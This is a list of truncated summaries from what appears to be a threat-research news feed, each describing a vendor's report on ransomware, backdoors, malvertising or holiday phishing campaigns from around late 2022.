Sophos’ postmortem analysis shows LockBit 3.0 (LockBit Black) carries wormable capabilities and borrows heavily from BlackMatter, including tooling used by affiliates and even legitimate pentesters. The investigation highlights evolving self-spread techniques,…
Category: Threat Research
ESET researchers analyzed Dolphin, a previously unreported backdoor used by ScarCruft (APT37) that operatives deploy on select targets to exfiltrate files, log keystrokes, take screenshots, and steal browser credentials, using Google Drive for C2. The Dolphin …
The aviation sector in Southeast Asia faced multiple ransomware incidents targeting airlines in Malaysia, Thailand, Portugal, and Kuwait, linked to several threat actors including Daixin Team, ALPHVM (BlackCat), Ragnar Locker, and LockBit. The report outlines …
CRIL uncovered a new Punisher ransomware variant spreading via a COVID-19-themed phishing site that targets Chilean users. The malware uses timestomping, a volume-serial-number-based system ID, and data exfiltration before encryption, with victim-specific deta…
An Emotet-driven intrusion led to domain-wide deployment of Quantum ransomware after eight days, leveraging Cobalt Strike for discovery and lateral movement and remote-access tools for persistence. The operation included initial access via LNK, PowerShell-base…
A malvertising campaign exploiting Black Friday shopping interest redirects Google users searching for Walmart to tech support scam pages, using cloaking and disposable domains to hide malicious intent. Malwarebytes reported the activity to Google, highlightin…
Malware disguised as Word documents is being distributed via KakaoTalk group chats, using Template Injection to pull remote content from cleverly disguised URLs. Users are urged to verify sources and keep Office updated to avoid infection. #Kimsuky #TemplateIn…
An ASEC analysis highlights a password-protected Word document disguised as a CNA Singapore interview (filename CNA[Q].doc) used to target North Korea-related information and leak credentials via FTP. The embedded VBA macro auto-executes, creates and runs a VB…
FortiGuard Labs analyzes Cryptonite, an open-source, Python-based ransomware kit that encrypts Windows files and uses NGROK as a reverse proxy for C2. The report details how Cryptonite operates, its encryption method, IoCs, and Fortinet’s protective guidance a…
ThreatLabz notes a spike in fake FIFA World Cup 2022 streaming sites and related scams that lure fans via newly registered domains and fake links to harvest credentials or payment details. The campaign mix includes World Cup ticket and lottery scams, fake crac…
Fortinet FortiGuard Labs highlights two Black Friday-themed scams: a reused decoy PDF phishing lure and a typosquatting scheme that redirects shoppers to fake sites and surveys. The report also covers a Chrome-based PUA named Chromnius, protection recommendati…
Koxic ransomware is being observed in Korea, with samples adding the .KOXIC_[random string] extension and generating a per-directory ransom note named WANNA_RECOVER_KOXIC_FILEZ_[Random string]. The campaign features UPX Trick obfuscation, Defender avoidance, a…
Wiki ransomware, identified by ASEC, is a disguised variant of Crysis that spreads as a normal program and encrypts files. It uses persistence, process termination, and shadow-copy deletion to hinder recovery, with distribution commonly linked to RDP environme…
Check Point Research warns of a sharp rise in fake shopping-related sites and phishing campaigns ahead of Black Friday, including impersonation of Louis Vuitton and DHL delivery scams. The report highlights lookalike domains, malicious emails, and delivery-the…
Cybereason’s Global SOC is tracking a wide Black Basta ransomware campaign that leverages QakBot (QakBot) to gain entry and move laterally in U.S.-based organizations. The campaign ties QakBot infections to rapid deployment of Black Basta, including DNS disrup…